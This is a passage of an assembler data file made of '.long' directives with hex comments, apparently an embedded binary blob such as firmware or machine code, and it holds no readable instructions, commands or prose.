## 0x9102c000 .long 1041289745 ## 0x3e10d211 .long 1124906368 ## 0x430cb580 .long 2428551168 ## 0x90c0c000 .long 754831350 ## 0x2cfdcff6 .long 1125430560 ## 0x4314b520 .long 1125431072 ## 0x4314b720 .long 772854033 ## 0x2e10d111 .long 3221255424 ## 0xc0007500 .long 2231799970 ## 0x850690a2 .long 1243395392 ## 0x4a1cb540 .long 3500307968 ## 0xd0a27600 .long 142761501 ## 0x8825e1d .long 143839234 ## 0x892d002 .long 2030184964 ## 0x79022a04 .long 2432876544 ## 0x9102c000 .long 1041289489 ## 0x3e10d111 .long 1124906368 ## 0x430cb580 .long 2434842624 ## 0x9120c000 .long 3221255872 ## 0xc00076c0 .long 3223359682 ## 0xc02090c2 .long 3038788736 ## 0xb5203c80 .long 3072344852 ## 0xb7204314 .long 3490792204 ## 0xd011430c .long 1962945042 ## 0x75002a12 .long 2430779392 ## 0x90e2c000 .long 1267513216 ## 0x4b8cb780 .long 3221238296 ## 0xc0003218 .long 3078656192 ## 0xb78090c0 .long 1249725324 ## 0x4a7d4b8c .long 3045073432 ## 0xb5802218 .long 3072344844 ## 0xb720430c .long 3490792204 ## 0xd011430c .long 1962945044 ## 0x75002a14 .long 2432876544 ## 0x9102c000 .long 974311441 ## 0x3a12d011 .long 1124906368 ## 0x430cb580 .long 2426454016 ## 0x90a0c000 .long 3038783737 ## 0xb52028f9 .long 3624944396 ## 0xd810430c .long 3074468033 ## 0xb740a8c1 .long 3624947612 ## 0xd8104f9c .long 3792742981 ## 0xe210aa45 .long 3254814883 ## 0xc20088a3 .long 1883789841 ## 0x70485a11 .long 2419507203 ## 0x9036c003 .long 168349969 ## 0xa08d111 .long 2827147784 ## 0xa882da08 .long 1124906784 ## 0x430cb720 .long 1233958720 ## 0x498cb740 .long 2655804561 ## 0x9e4c5c91 .long 1133819712 ## 0x4394b740 .long 3038787720 ## 0xb5203888 .long 1887978252 ## 0x7088430c .long 1023459584 ## 0x3d00c100 .long 1133819200 ## 0x4394b540 .long 2457387008 ## 0x9278c000 .long 1519171361 ## 0x5a8cb721 .long 1950391892 ## 0x74409e54 .long 973389825 ## 0x3a04c001 .long 1133294976 ## 0x438cb580 .long 2435104768 ## 0x9124c000 .long 1023721489 ## 0x3d04c011 .long 1133819200 ## 0x4394b540 .long 3040969990 ## 0xb5418506 .long 3507640988 ## 0xd1125a9c .long 3078621324 ## 0xb780088c .long 3072344139 ## 0xb720404b .long 3254800268 ## 0xc2004f8c .long 1883789841 ## 0x70485a11 .long 2434187264 ## 0x9116c000 .long 1133295488 ## 0x438cb780 .long 974176257 ## 0x3a10c001 .long 1133294976 ## 0x438cb580 .long 1078704000 ## 0x404bb780 .long 1511113216 ## 0x5a11c200 .long 1883773448 ## 0x70481a08 .long 2434187264 ## 0x9116c000 .long 1133295488 ## 0x438cb780 .long 977321985 ## 0x3a40c001 .long 1133294976 ## 0x438cb580 .long 1343534880 ## 0x5014b720 .long 168349969 ## 0xa08d111 .long 2827082248 ## 0xa881da08 .long 1485938252 ## 0x58919e4c .long 3221254402 ## 0xc0007102 .long 3078656258 ## 0xb7809102 .long 3221570444 ## 0xc005438c .long 3045079552 ## 0xb5803a00 .long 3078636428 ## 0xb780438c .long 3229893516 ## 0xc084438c .long 3045079552 ## 0xb5803a00 .long 3221242764 ## 0xc000438c .long 3078656416 ## 0xb78091a0 .long 3072344844 ## 0xb720430c .long 712328076 ## 0x2a75438c .long 1124906368 ## 0x430cb580 .long 687722490 ## 0x28fdcffa .long 1133294880 ## 0x438cb520 .long 1124906816 ## 0x430cb740 .long 690155538 ## 0x2922f012 .long 2432876544 ## 0x9102c000 .long 1133295488 ## 0x438cb780 .long 973127808 ## 0x3a00c080 .long 1133294976 ## 0x438cb580 .long 1233958784 ## 0x498cb780 .long 1268037408 ## 0x4b94b720 .long 1343010592 ## 0x500cb720 .long 3045067268 ## 0xb5800a04 .long 2655799692 ## 0x9e4c498c .long 142899336 ## 0x8847888 .long 1343010080 ## 0x500cb520 .long 2451750912 ## 0x9222c000 .long 3221255808 ## 0xc0007680 .long 3072364996 ## 0xb72091c4 .long 3490793228 ## 0xd011470c .long 3045079586 ## 0xb5803a22 .long 2231780108 ## 0x8506430c .long 1276949824 ## 0x4c1cb540 .long 3038783737 ## 0xb52028f9 .long 3507570444 ## 0xd111470c .long 3657959944 ## 0xda080a08 .long 3072370817 ## 0xb720a881 .long 3221377044 ## 0xc0025014 .long 3229620416 ## 0xc08018c0 .long 3254803071 ## 0xc2005a7f .long 9984625 ## 0x985a71 .long 3074465356 ## 0xb7409e4c .long 1486046988 ## 0x5893470c .long 3040899330 ## 0xb5407102 .long 3221309324 ## 0xc001478c .long 3074461764 ## 0xb7409044 .long 33899404 ## 0x205438c .long 704692352 ## 0x2a00c080 .long 3221255424 ## 0xc0007500 .long 3072365378 ## 0xb7209342 .long 33902484 ## 0x2054f94 .long 3254875714 ## 0xc2017642 .long 3045079552 ## 0xb5803a00 .long 3221242764 ## 0xc000438c .long 3507589660 ## 0xd111921c .long 3657959948 ## 0xda080a0c .long 210544769 ## 0xc8ca881 .long 1485938252 ## 0x58919e4c .long 3221254402 ## 0xc0007102 .long 3389100246 ## 0xca0190d6 .long 3040884992 ## 0xb5403900 .long 3072344972 ## 0xb720438c .long 3507572756 ## 0xd1115014 .long 3657959944 ## 0xda080a08 .long 2655824001 ## 0x9e4ca881 .long 1895979153 ## 0x71025891 .long 2457387008 ## 0x9278c000 .long 1133295392 ## 0x438cb720 .long 3221553667 ## 0xc0050203 .long 1962945024 ## 0x75002a00 .long 2439168000 ## 0x9162c000 .long 947962113 ## 0x3880c101 .long 1133294880 ## 0x438cb520 .long 3040904454 ## 0xb5408506 .long 3040889500 ## 0xb5404a9c .long 1979730716 ## 0x76004b1c .long 2434973696 ## 0x9122c000 .long 1343010688 ## 0x500cb780 .long 3221255436 ## 0xc000750c .long 3221262626 ## 0xc0009122 .long 3078656672 ## 0xb78092a0 .long 1963610124 ## 0x750a500c .long 2449784832 ## 0x9204c000 .long 1250736000 ## 0x4a8cb780 .long 3221255424 ## 0xc0007500 .long 3078656354 ## 0xb7809162 .long 2231518092 ## 0x8502438c .long 1251784000 ## 0x4a9cb540 .long 973128705 ## 0x3a00c401 .long 1133294976 ## 0x438cb580 .long 1343010688 ## 0x500cb780 .long 3221255430 ## 0xc0007506 .long 3078656516 ## 0xb7809204 .long 1962953484 ## 0x75004b0c .long 2439168000 ## 0x9162c000 .long 1133295488 ## 0x438cb780 .long 3040904450 ## 0xb5408502 .long 3355462428 ## 0xc8004b1c .long 3045079552 ## 0xb5803a00 .long 3072344972 ## 0xb720438c .long 3507572756 ## 0xd1115014 .long 3657959944 ## 0xda080a08 .long 2655824001 ## 0x9e4ca881 .long 1895979153 ## 0x71025891 .long 2438512640 ## 0x9158c000 .long 1334622080 ## 0x4f8cb780 .long 3040904450 ## 0xb5408502 .long 168054812 ## 0xa04501c .long 1334621568 ## 0x4f8cb580 .long 1124906880 ## 0x430cb780 .long 2231530752 ## 0x85027500 .long 2437201920 ## 0x9144c000 .long 1133295488 ## 0x438cb780 .long 704693248 ## 0x2a00c400 .long 2231530752 ## 0x85027500 .long 2233655297 ## 0x8522e001 .long 2619514179 ## 0x9c229d43 .long 1518909317 ## 0x5a88b785 .long 3076551936 ## 0xb7607500 .long 3221314060 ## 0xc0015a0c .long 3072365476 ## 0xb72093a4 .long 3078642316 ## 0xb7805a8c .long 706757421 ## 0x2a20432d .long 3074454784 ## 0xb7407500 .long 3074441736 ## 0xb7404208 .long 3221249820 ## 0xc0005f1c .long 3074461826 ## 0xb7409082 .long 2639487004 ## 0x9d53601c .long 2831532096 ## 0xa8c5c040 .long 1511307040 ## 0x5a14b720 .long 438620209 ## 0x1a24d031 .long 1785905154 ## 0x6a72c002 .long 1763561490 ## 0x691dd012 .long 210817585 ## 0xc90d231 .long 1962974795 ## 0x75009e4b .long 1077261632 ## 0x4035b540 .long 210817617 ## 0xc90d251 .long 1076737408 ## 0x402db580 .long 1090572348 ## 0x4100d03c .long 1312338961 ## 0x4e38b411 .long 1076737920 ## 0x402db780 .long 1966653624 ## 0x7538c0b8 .long 2430386176 ## 0x90dcc000 .long 2238890076 ## 0x8572c05c .long 1077785920 ## 0x403db540 .long 1781387281 ## 0x6a2dd011 .long 145805938 ## 0x8b0d272 .long 146330161 ## 0x8b8d231 .long 1077261632 ## 0x4035b540 .long 1078834560 ## 0x404db580 .long 170971697 ## 0xa30d231 .long 2852254216 ## 0xaa01f208 .long 3221255424 ## 0xc0007500 .long 3225325762 ## 0xc03e90c2 .long 3028356278 ## 0xb4810cb6 .long 3528572928 ## 0xd251c000 .long 4060613168 ## 0xf2080a30 .long 3225331841 ## 0xc03ea881 .long 3022064810 ## 0xb4210caa .long 3526475776 ## 0xd231c000 .long 4060613176 ## 0xf2080a38 .long 1962977793 ## 0x7500aa01 .long 2434973696 ## 0x9122c000 .long 1514193408 ## 0x5a40c200 .long 973129729 ## 0x3a00c801 .long 3028356240 ## 0xb4810c90 .long 3528572928 ## 0xd251c000 .long 4060613176 ## 0xf2080a38 .long 1962977793 ## 0x7500aa01 .long 2428682240 ## 0x90c2c000 .long 211992638 ## 0xca2c03e .long 3221271681 ## 0xc000b481 .long 170971761 ## 0xa30d271 .long 2827088392 ## 0xa881f208 .long 210419774 ## 0xc8ac03e .long 3221271585 ## 0xc000b421 .long 2793774114 ## 0xa6859c22 .long 210945086 ## 0xc92c43e .long 3028355586 ## 0xb4810a02 .long 2969812992 ## 0xb103c000 .long 3078636064 ## 0xb7804220 .long 3657980044 ## 0xda08588c .long 3658000517 ## 0xda08a885 .long 3658000649 ## 0xda08a909 .long 3657998729 ## 0xda08a189 .long 3657998465 ## 0xda08a081 .long 214999301 ## 0xcd0a105 .long 3028355586 ## 0xb4810a02 .long 2969812992 ## 0xb103c000 .long 3078636064 ## 0xb7804220 .long 3082835980 ## 0xb7c0580c .long 3657980044 ## 0xda08588c .long 2661656709 ## 0x9ea5a885 .long 2827672072 ## 0xa88ada08 .long 2710166024 ## 0xa189da08 .long 763412488 ## 0x2d80c008 .long 3657987776 ## 0xda0876c0 .long 3657998465 ## 0xda08a081 .long 3221987462 ## 0xc00ba086 .long 3078656258 ## 0xb7809102 .long 168052488 ## 0xa044708 .long 1191753088 ## 0x4708b580 .long 212255824 ## 0xca6c450 .long 3028355586 ## 0xb4810a02 .long 2969812992 ## 0xb103c000 .long 8864288 ## 0x874220 .long 679526449 ## 0x2880c031 .long 3222209031 ## 0xc00f0207 .long 3500419708 ## 0xd0a42a7c .long 3525859425 ## 0xd2285861 .long 42424769 ## 0x28759c1 .long 721211390 ## 0x2afccffe .long 167906440 ## 0xa020c88 .long 3221271681 ## 0xc000b481 .long 1109438723 ## 0x4220b103 .long 1505874342 ## 0x59c1d1a6 .long 3489530119 ## 0xcffe0107 .long 213657980 ## 0xcbc297c .long 3221271681 ## 0xc000b481 .long 1109438723 ## 0x4220b103 .long 3078750343 ## 0xb7820087 .long 3237769354 ## 0xc0fc708a .long 3500419200 ## 0xd0a42880 .long 3072678681 ## 0xb7255b19 .long 3505478288 ## 0xd0f15a90 .long 302524478 ## 0x1208283e .long 1983946402 ## 0x76409ea2 .long 1888138498 ## 0x708ab502 .long 1073986066 ## 0x4003ba12 .long 2430910464 ## 0x90e4c000 .long 1527297925 ## 0x5b08b785 .long 3221386496 ## 0xc0027500 .long 3078984612 ## 0xb78593a4 .long 1962957576 ## 0x75005b08 .long 2176049969 ## 0x81b3e331 .long 19386385 ## 0x127d011 .long 1519171456 ## 0x5a8cb780 .long 209876482 ## 0xc827602 .long 210948097 ## 0xc92d001 .long 2828661256 ## 0xa899f208 .long 679779916 ## 0x28849e4c .long 3076552776 ## 0xb7607848 .long 3221247252 ## 0xc0005514 .long 3624964322 ## 0xd81090e2 .long 168077929 ## 0xa04aa69 .long 2724845584 ## 0xa269d810 .long 2842423312 ## 0xa96bf010 .long 2842488850 ## 0xa96cf012 .long 2150035472 ## 0x8026f010 .long 2191909392 ## 0x82a5e210 .long 2724851728 ## 0xa269f010 .long 2699948048 ## 0xa0edf010 .long 1342748546 ## 0x5008b782 .long 142767360 ## 0x8827500 .long 143839234 ## 0x892d002 .long 167933442 ## 0xa027602 .long 172150786 ## 0xa42d002 .long 3221256264 ## 0xc0007848 .long 3229388994 ## 0xc07c90c2 .long 3657991490 ## 0xda088542 .long 1979883843 ## 0x7602a143 .long 2842947600 ## 0xa973f010 .long 2428813312 ## 0x90c4c000 .long 2854345232 ## 0xaa21da10 .long 2424356864 ## 0x9080c000 .long 2856442376 ## 0xaa41da08 .long 2158093072 ## 0x80a1e310 .long 2859325456 ## 0xaa6dd810 .long 2700210192 ## 0xa0f1f010 .long 168064518 ## 0xa047606 .long 2725107728 ## 0xa26dd810 .long 2435104768 ## 0x9124c000 .long 1200142208 ## 0x4788b780 .long 3045067268 ## 0xb5800a04 .long 3221637000 ## 0xc0064788 .long 2231538176 ## 0x85029200 .long 1201190208 ## 0x4798b540 .long 2439036934 ## 0x9160c006 .long 1519171360 ## 0x5a8cb720 .long 1427420960 ## 0x5514b720 .long 19387184 ## 0x127d330 .long 1127069568 ## 0x432db780 .long 2166539009 ## 0x8122c301 .long 1162196800 ## 0x4545b740 .long 1962945028 ## 0x75002a04 .long 2150101008 ## 0x8027f010 .long 2183262992 ## 0x8221f310 .long 3045066115 ## 0xb5800583 .long 3221308749 ## 0xc001454d .long 1979879586 ## 0x760290a2 .long 2428813312 ## 0x90c4c000 .long 2854345232 ## 0xaa21da10 .long 2424356864 ## 0x9080c000 .long 2856442376 ## 0xaa41da08 .long 2726156304 ## 0xa27dd810 .long 3221321222 ## 0xc0017606 .long 1979748482 ## 0x76009082 .long 2443493376 ## 0x91a4c000 .long 3624957568 ## 0xd8107680 .long 3758270835 ## 0xe002a973 .long 4061170986 ## 0xf2108d2a .long 3624960037 ## 0xd8108025 .long 3221267057 ## 0xc000a271 .long 1988137664 ## 0x768092c0 .long 2842155088 ## 0xa967d850 .long 2368135170 ## 0x8d26e002 .long 2439036928 ## 0x9160c000 .long 2854345232 ## 0xaa21da10 .long 3629151872 ## 0xd8507680 .long 3624970599 ## 0xd810a967 .long 3758269053 ## 0xe002a27d .long 4061170986 ## 0xf2108d2a .long 3629154341 ## 0xd8508025 .long 3078988389 ## 0xb785a265 .long 1962957832 ## 0x75005c08 .long 2464333824 ## 0x92e2c000 .long 1091221376 ## 0x410ab780 .long 3221254152 ## 0xc0007008 .long 2231538244 ## 0x85029244 .long 1545123141 ## 0x5c18b545 .long 209896506 ## 0xc82c43a .long 3028355586 ## 0xb4810a02 .long 2969812992 ## 0xb103c000 .long 3488563744 ## 0xcfef4220 .long 3225037310 ## 0xc03a29fe .long 3026259074 ## 0xb4610c82 .long 3078668288 ## 0xb780c000 .long 1879589130 ## 0x7008410a .long 3489794178 ## 0xd0020882 .long 1980106898 ## 0x76060892 .long 3489729026 ## 0xd0010a02 .long 2017987138 ## 0x78480a42 .long 2453848064 ## 0x9242c000 .long 3041232134 ## 0xb5458506 .long 3292159000 ## 0xc43a5c18 .long 167906434 ## 0xa020c82 .long 3221271681 ## 0xc000b481 .long 1109438723 ## 0x4220b103 .long 964739089 ## 0x3980c011 .long 209895482 ## 0xc82c03a .long 3221271649 ## 0xc000b461 .long 3221321600 ## 0xc0017780 .long 1979748706 ## 0x76009162 .long 2462367744 ## 0x92c4c000 .long 2856442376 ## 0xaa41da08 .long 2842161168 ## 0xa967f010 .long 2834683920 ## 0xa8f5d810 .long 2835011600 ## 0xa8fad810 .long 2149708560 ## 0x8021f310 .long 3624927362 ## 0xd8100082 .long 210018549 ## 0xc84a0f5 .long 2700793872 ## 0xa0fad810 .long 2724589584 ## 0xa265f010 .long 2457911296 ## 0x9280c000 .long 2854345232 ## 0xaa21da10 .long 2843471888 ## 0xa97bf010 .long 2833897552 ## 0xa8e9d850 .long 2834225232 ## 0xa8eed850 .long 2149708560 ## 0x8021f310 .long 3629121666 ## 0xd8500082 .long 210018537 ## 0xc84a0e9 .long 2700007504 ## 0xa0eed850 .long 2725900304 ## 0xa279f010 .long 2860374032 ## 0xaa7dd810 .long 2843734032 ## 0xa97ff010 .long 2841702482 ## 0xa960f052 .long 2850549840 ## 0xa9e7f050 .long 2149708560 ## 0x8021f310 .long 2842685520 ## 0xa96ff050 .long 2726162448 ## 0xa27df010 .long 2183394064 ## 0x8223f310 .long 2833438800 ## 0xa8e2d850 .long 2724327504 ## 0xa261f050 .long 2151149584 ## 0x8037f010 .long 2158092816 ## 0x80a1e210 .long 3629124740 ## 0xd8500c84 .long 4031815906 ## 0xf050a0e2 .long 4031816293 ## 0xf050a265 .long 3082789101 ## 0xb7bfa0ed .long 3084877678 ## 0xb7df7f6e .long 2353037294 ## 0x8c407fee .long 2785385506 ## 0xa6059c22 .long 1494005633 ## 0x590cb781 .long 704692232 ## 0x2a00c008 .long 3221255424 ## 0xc0007500 .long 3078656642 ## 0xb7809282 .long 3072349452 ## 0xb720550c .long 4060634764 ## 0xf2085e8c .long 3070273922 ## 0xb700a982 .long 2659468589 ## 0x9e84452d .long 3078724706 ## 0xb7819c62 .long 3036698892 ## 0xb500590c .long 3489021962 ## 0xcff6400a .long 3045141117 ## 0xb5812a7d .long 3078707468 ## 0xb781590c .long 3222296844 ## 0xc010590c .long 1962945024 ## 0x75002a00 .long 2445459457 ## 0x91c2c001 .long 1586280352 ## 0x5e8cb7a0 .long 1427421088 ## 0x5514b7a0 .long 2821059080 ## 0xa825f208 .long 2659452299 ## 0x9e84058b .long 4064844898 ## 0xf2489c62 .long 2661591585 ## 0x9ea4aa21 .long 3072367714 ## 0xb7209c62 .long 3072676748 ## 0xb725538c .long 3078645264 ## 0xb7806610 .long 2655601195 ## 0x9e49422b .long 3221254216 ## 0xc0007048 .long 4061172258 ## 0xf2109222 .long 4060653985 ## 0xf208a9a1 .long 226928701 ## 0xd86a83d .long 2623708804 ## 0x9c629e84 .long 2854613576 ## 0xaa25f248 .long 2686579216 ## 0xa021f210 .long 159778187 ## 0x986058b .long 2623708836 ## 0x9c629ea4 .long 1494005633 ## 0x590cb781 .long 712888302 ## 0x2a7dcfee .long 1494005121 ## 0x590cb581 .long 1494005537 ## 0x590cb721 .long 3223323139 ## 0xc0200203 .long 1962945024 ## 0x75002a00 .long 2428682240 ## 0x90c2c000 .long 687722462 ## 0x28fdcfde .long 1494005025 ## 0x590cb521 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 2718300217 ## 0xa205f839 .long 1494005633 ## 0x590cb781 .long 2097201200 ## 0x7d00c030 .long 2439168000 ## 0x9162c000 .long 1301067648 ## 0x4d8cb780 .long 704692232 ## 0x2a00c008 .long 3221255424 ## 0xc0007500 .long 4294217858 ## 0xfff49082 .long 3076561810 ## 0xb7609b92 .long 4287909268 ## 0xff944d94 .long 167942913 ## 0xa029b01 .long 211992672 ## 0xca2c060 .long 3221271681 ## 0xc000b481 .long 1301591904 ## 0x4d94b760 .long 2582380532 ## 0x99ebfff4 .long 1200142208 ## 0x4788b780 .long 1966391324 ## 0x7534c01c .long 2433007616 ## 0x9104c000 .long 3041232134 ## 0xb5458506 .long 2231527448 ## 0x85026818 .long 1201190208 ## 0x4798b540 .long 1510520709 ## 0x5a08b785 .long 3221320960 ## 0xc0017500 .long 3078656642 ## 0xb7809282 .long 3072349068 ## 0xb720538c .long 3657975568 ## 0xda084710 .long 2655824013 ## 0x9e4ca88d .long 3221319938 ## 0xc0017102 .long 3072430148 ## 0xb7219044 .long 33773836 ## 0x203590c .long 704692240 ## 0x2a00c010 .long 3221255424 ## 0xc0007500 .long 3223359746 ## 0xc0209102 .long 3038853248 ## 0xb5213880 .long 4294203660 ## 0xfff4590c .long 3078724444 ## 0xb7819b5c .long 3072678156 ## 0xb725590c .long 3072353800 ## 0xb7206608 .long 2231517202 ## 0x85024012 .long 1192801600 ## 0x4718b540 .long 3039103108 ## 0xb5250884 .long 3038799368 ## 0xb5206608 .long 3222814994 ## 0xc0184112 .long 3045145088 ## 0xb5813a00 .long 3078641932 ## 0xb780590c .long 3222293900 ## 0xc0104d8c .long 3221255424 ## 0xc0007500 .long 4294217860 ## 0xfff49084 .long 4193818929 ## 0xf9f89931 .long 2619517469 ## 0x9c22aa1d .long 3078661661 ## 0xb780a61d .long 3509672972 ## 0xd1315c0c .long 3072329920 ## 0xb72008c0 .long 3499245611 ## 0xd092402b .long 1983916176 ## 0x76402890 .long 3221488521 ## 0xc0040389 .long 2231538370 ## 0x850292c2 .long 1612232005 ## 0x6018b545 .long 3490809090 ## 0xd0118502 .long 1962945044 ## 0x75002a14 .long 1469887809 ## 0x579cb541 .long 3041232134 ## 0xb5458506 .long 3221248536 ## 0xc0005a18 .long 3041235074 ## 0xb5459082 .long 3507575448 ## 0xd1115a98 .long 1962945040 ## 0x75002a10 .long 2424487936 ## 0x9082c000 .long 1528345925 ## 0x5b18b545 .long 3225420291 ## 0xc0400203 .long 1962945024 ## 0x75002a00 .long 2424487936 ## 0x9082c000 .long 1536734533 ## 0x5b98b545 .long 1527297925 ## 0x5b08b785 .long 3082843392 ## 0xb7c07500 .long 3221380756 ## 0xc0025e94 .long 3078984162 ## 0xb78591e2 .long 1962957448 ## 0x75005a88 .long 2437201922 ## 0x9144c002 .long 172148745 ## 0xa42c809 .long 175163318 ## 0xa70c7b6 .long 146982921 ## 0x8c2c809 .long 144754618 ## 0x8a0c7ba .long 214091785 ## 0xcc2c809 .long 216057950 ## 0xce0c85e .long 155371529 ## 0x942c809 .long 151046282 ## 0x900c88a .long 222480393 ## 0xd42c809 .long 220252070 ## 0xd20c7a6 .long 163760137 ## 0x9c2c809 .long 161531722 ## 0x9a0c74a .long 230869001 ## 0xdc2c809 .long 231786330 ## 0xdd0c75a .long 205703177 ## 0xc42c809 .long 204523184 ## 0xc30c6b0 .long 138594313 ## 0x842c809 .long 134268542 ## 0x800c67e .long 180537353 ## 0xac2c809 .long 183551638 ## 0xaf0c696 .long 247646217 ## 0xec2c809 .long 247514756 ## 0xec0c684 .long 188925961 ## 0xb42c809 .long 190892206 ## 0xb60c8ae .long 2722755088 ## 0xa249f210 .long 2698113552 ## 0xa0d1f210 .long 2698441232 ## 0xa0d6f210 .long 2707026448 ## 0xa159f210 .long 2706305552 ## 0xa14ef210 .long 2715677200 ## 0xa1ddf210 .long 2713907792 ## 0xa1c2f250 .long 2689004112 ## 0xa046f250 .long 2689200720 ## 0xa049f250 .long 2730881552 ## 0xa2c5f210 .long 2730684944 ## 0xa2c2f210 .long 2739794512 ## 0xa34df250 .long 1561114528 ## 0x5d0cb7a0 .long 2857234960 ## 0xaa4df210 .long 2661588651 ## 0x9ea49eab .long 3687357538 ## 0xdbc89c62 .long 3074468409 ## 0xb740aa39 .long 2231522444 ## 0x8502548c .long 1083880768 ## 0x409ab540 .long 2829177352 ## 0xa8a1d208 .long 2831086152 ## 0xa8bef248 .long 704692240 ## 0x2a00c010 .long 3624432896 ## 0xd8087500 .long 3038814413 ## 0xb520a0cd .long 3221243412 ## 0xc0004614 .long 3078721794 ## 0xb7819102 .long 3225442572 ## 0xc040590c .long 3045145088 ## 0xb5813a00 .long 3078969612 ## 0xb785590c .long 1962957320 ## 0x75005a08 .long 2420293637 ## 0x9042c005 .long 1494005633 ## 0x590cb781 .long 2097201200 ## 0x7d00c030 .long 2424487936 ## 0x9082c000 .long 2593259508 ## 0x9a91fff4 .long 1402255136 ## 0x5394b720 .long 2858808008 ## 0xaa65f2c8 .long 1129166624 ## 0x434db720 .long 3082842184 ## 0xb7c07048 .long 109272724 ## 0x6835e94 .long 2432876544 ## 0x9102c000 .long 2857235024 ## 0xaa4df250 .long 167301426 ## 0x9f8d132 .long 2623708836 ## 0x9c629ea4 .long 1082832672 ## 0x408ab720 .long 3041035522 ## 0xb5428502 .long 1950371992 ## 0x74405098 .long 1360573762 ## 0x5118b542 .long 1368962370 ## 0x5198b542 .long 2430779392 ## 0x90e2c000 .long 2855655952 ## 0xaa35da10 .long 3221254216 ## 0xc0007048 .long 3078984516 ## 0xb7859344 .long 3658504840 ## 0xda105a88 .long 4061178294 ## 0xf210a9b6 .long 2231544009 ## 0x8502a8c9 .long 3040900352 ## 0xb5407500 .long 2232041626 ## 0x850a409a .long 2368004097 ## 0x8d24e001 .long 495230287 ## 0x1d849d4f .long 2623708812 ## 0x9c629e8c .long 2857497104 ## 0xaa51f210 .long 2661551498 ## 0x9ea40d8a .long 3221265506 ## 0xc0009c62 .long 4061171936 ## 0xf21090e0 .long 226929233 ## 0xd86aa51 .long 2623708836 ## 0x9c629ea4 .long 1494005633 ## 0x590cb781 .long 1082832672 ## 0x408ab720 .long 1426896800 ## 0x550cb7a0 .long 3041232130 ## 0xb5458502 .long 3221775896 ## 0xc0086618 .long 3045145088 ## 0xb5813a00 .long 4061157644 ## 0xf210590c .long 2662050369 ## 0x9eabaa41 .long 3038775428 ## 0xb5200884 .long 2661564554 ## 0x9ea4408a .long 3072367714 ## 0xb7209c62 .long 3078641932 ## 0xb780590c .long 1962950953 ## 0x75004129 .long 3221226243 ## 0xc0000303 .long 4060648164 ## 0xf20892e4 .long 4061178273 ## 0xf210a9a1 .long 226666589 ## 0xd82a85d .long 2623708804 ## 0x9c629e84 .long 2686579208 ## 0xa021f208 .long 2823156304 ## 0xa845f250 .long 159555243 ## 0x9829eab .long 2623708804 ## 0x9c629e84 .long 2854345224 ## 0xaa21da08 .long 1888138626 ## 0x708ab582 .long 2441134080 ## 0x9180c000 .long 1443673888 ## 0x560cb720 .long 2854867472 ## 0xaa29d210 .long 1153152832 ## 0x44bbb740 .long 2149708560 ## 0x8021f310 .long 1152103808 ## 0x44abb580 .long 2831798792 ## 0xa8c9d208 .long 3221255232 ## 0xc0007440 .long 3078656290 ## 0xb7809122 .long 2231780620 ## 0x8506450c .long 2702701064 ## 0xa117f208 .long 2428551168 ## 0x90c0c000 .long 1158461312 ## 0x450cb780 .long 2694181384 ## 0xa095f208 .long 1418508064 ## 0x548cb720 .long 1101772672 ## 0x41abb780 .long 1888138626 ## 0x708ab582 .long 1074443648 ## 0x400ab580 .long 1091220864 ## 0x410ab580 .long 2432745472 ## 0x9100c000 .long 1158461312 ## 0x450cb780 .long 2828655112 ## 0xa899da08 .long 1091220768 ## 0x410ab520 .long 2121185183 ## 0x7e6eb79f .long 2129573823 ## 0x7eeeb7bf .long 2137962463 ## 0x7f6eb7df .long 2146351103 ## 0x7feeb7ff .long 2348859394 ## 0x8c00c002 .long 2619513890 ## 0x9c229c22 .long 1073986075 ## 0x4003ba1b .long 2656869977 ## 0x9e5c9e59 .long 1073920515 ## 0x4002ba03 .long 1073986066 ## 0x4003ba12 .long 2656268352 ## 0x9e537040 .long 2436284416 ## 0x9136c000 .long 3221254150 ## 0xc0007006 .long 3356660056 ## 0xc8129158 .long 3221254852 ## 0xc00072c4 .long 2656145792 ## 0x9e519180 .long 3221254146 ## 0xc0007002 .long 2659356860 ## 0x9e8290bc .long 2426454016 ## 0x90a0c000 .long 1892207632 ## 0x70c8cc10 .long 2656083610 ## 0x9e509e9a .long 2786958370 ## 0xa61d9c22 .long 3555788679 ## 0xd3f10787 .long 2662018814 ## 0x9eab2efe .long 3222538626 ## 0xc0140982 .long 2662046189 ## 0x9eab99ed .long 714003442 ## 0x2a8ed3f2 .long 3222538630 ## 0xc0140986 .long 3072367079 ## 0xb72099e7 .long 3074448012 ## 0xb7405a8c .long 3490996124 ## 0xd0145f9c .long 3078625618 ## 0xb7801952 .long 3555869485 ## 0xd3f2432d .long 2653759758 ## 0x9e2d290e .long 1962945056 ## 0x75002a20 .long 2842542112 ## 0xa96dc020 .long 3221225859 ## 0xc0000183 .long 3074461890 ## 0xb74090c2 .long 3223347356 ## 0xc020609c .long 3291785581 ## 0xc434a96d .long 167906462 ## 0xa020c9e .long 3221271681 ## 0xc000b481 .long 1109438727 ## 0x4220b107 .long 1579208994 ## 0x5e20d122 .long 217759798 ## 0xcfac036 .long 3028365864 ## 0xb4813228 .long 3533881344 ## 0xd2a2c000 .long 210001056 ## 0xc845ca0 .long 3022074066 ## 0xb42130d2 .long 155107328 ## 0x93ec000 .long 484491266 ## 0x1ce0c002 .long 3221271617 ## 0xc000b441 .long 1351399296 ## 0x508cb780 .long 1962945032 ## 0x75002a08 .long 2455945228 ## 0x9262c00c .long 2860118024 ## 0xaa79f008 .long 1962945056 ## 0x75002a20 .long 2443362316 ## 0x91a2c00c .long 230866952 ## 0xdc2c008 .long 2567765908 ## 0x990cff94 .long 3263169153 ## 0xc2800281 .long 2660063364 ## 0x9e8d5884 .long 1531171492 ## 0x5b43d2a4 .long 1073986093 ## 0x4003ba2d .long 1585435298 ## 0x5e7fd2a2 .long 3254820457 ## 0xc2009e69 .long 35150453 ## 0x2185a75 .long 1552208674 ## 0x5c84d322 .long 1519374884 ## 0x5a8fd224 .long 3124141710 ## 0xba369e8e .long 3542237187 ## 0xd3224003 .long 2658229887 ## 0x9e715e7f .long 1517666816 ## 0x5a75c200 .long 3525575192 ## 0xd2240218 .long 3224656655 ## 0xc0345b0f .long 146934942 ## 0x8c20c9e .long 3221271585 ## 0xc000b421 .long 227721220 ## 0xd92c004 .long 2565275540 ## 0x98e6ff94 .long 1107998592 ## 0x420ab780 .long 2101272572 ## 0x7d3edffc .long 671877762 ## 0x280c0a82 .long 2416230401 ## 0x9004c001 .long 1116387200 ## 0x428ab780 .long 2101272572 ## 0x7d3edffc .long 2470756352 ## 0x9344c000 .long 1569503008 ## 0x5d8cb720 .long 1076606848 ## 0x402bb780 .long 1645524768 ## 0x6214b720 .long 1653389088 ## 